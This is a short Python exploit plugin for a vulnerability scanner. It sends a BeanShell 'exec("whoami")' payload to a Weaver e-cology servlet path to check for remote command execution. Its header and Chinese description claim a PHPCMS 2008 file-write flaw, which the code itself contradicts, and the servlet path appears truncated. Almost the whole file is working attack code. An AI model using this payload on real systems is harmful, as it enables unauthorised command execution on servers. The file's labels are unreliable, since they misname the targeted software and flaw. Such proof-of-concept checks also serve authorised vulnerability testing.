# Author:w8ay
# Name:phpcms 2008 rce
'''
referer: https://cloud.tencent.com/developer/article/1514434
description: 攻击者利用该漏洞，可在未授权的情况下实现对网站文件的写入。该漏洞危害程度为高危(High)。目前，漏洞利用原理已公开，厂商已发布新版本修复此漏洞。
'''
import HackRequests

def poc(arg, **kwargs):
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
    }
    payload = r'''/weaver/bsh.servlet.BshServle'''
    url_preffix = arg + payload
    post_data={
        "bsh.script":"exec(\"whoami\")"
    }
    hh = HackRequests.http(url_preffix,post=post_data,timeout=10)
    if hh.status_code == 200 and 'BeanShell' in hh.text():
        result = {
            "name": "e-cology_rce",  # 插件名称
            "content": "攻击者利用该漏洞，可在未授权的情况下实现对网站文件的写入。该漏洞危害程度为高危(High)。",  # 插件返回内容详情，会造成什么后果。
            "url": url_preffix,  # 漏洞存在url
            "log": hh.log,
            "tag": "rce"  # 漏洞标签
        }
        return result

if __name__ == "__main__":
    pass